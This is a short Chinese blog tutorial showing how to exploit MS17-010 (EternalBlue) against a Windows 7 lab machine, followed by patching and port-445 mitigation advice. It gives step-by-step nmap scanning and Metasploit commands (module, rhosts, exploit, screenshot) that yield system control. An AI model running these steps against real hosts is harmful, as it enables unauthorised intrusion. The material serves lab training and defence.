MS17-010漏洞利用

MS17-010漏洞利用

 漏洞威胁

远程主动发起对漏洞主机135\137\138\139\445端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

影响范围

Windows XPWindows 7Windows10
Windows Server 2003Windows Server2008 R2Windows Server 2012 R2
Windows VistaWindows 8.1Windows Server 2016
Windows Server 2008Windows Server 2012
MS17-010影响的Windows系统版本

测试环境

主机IP地址工具
Kali Linux192.168.144.128Nmap
Windows 7192.168.144.129Metasploit
测试环境

Nmap扫描漏洞

nmap --script=vuln 192.168.144.129
图片[1]|MS17-010漏洞利用|桃派

扫描完成后发现存在MS17-010漏洞

打开Metasploit

Kali Linux终端内输入:

msfconsole
图片[2]|MS17-010漏洞利用|桃派
Metasploit

使用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置攻击载荷

set payload
图片[3]|MS17-010漏洞利用|桃派
set payload

设置rhosts

set rhosts 192.168.144.129
图片[4]|MS17-010漏洞利用|桃派

开始攻击

exploit
图片[5]|MS17-010漏洞利用|桃派

捕获屏幕

screenshot
图片[6]|MS17-010漏洞利用|桃派
图片[7]|MS17-010漏洞利用|桃派
图片[8]|MS17-010漏洞利用|桃派

分享一些命令

MS17-010修复方案

受影响的系统版本可以参照:

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。
© 版权声明
THE END
喜欢就支持一下吧
点赞1.3W+赞赏 分享
评论 抢沙发

请登录后发表评论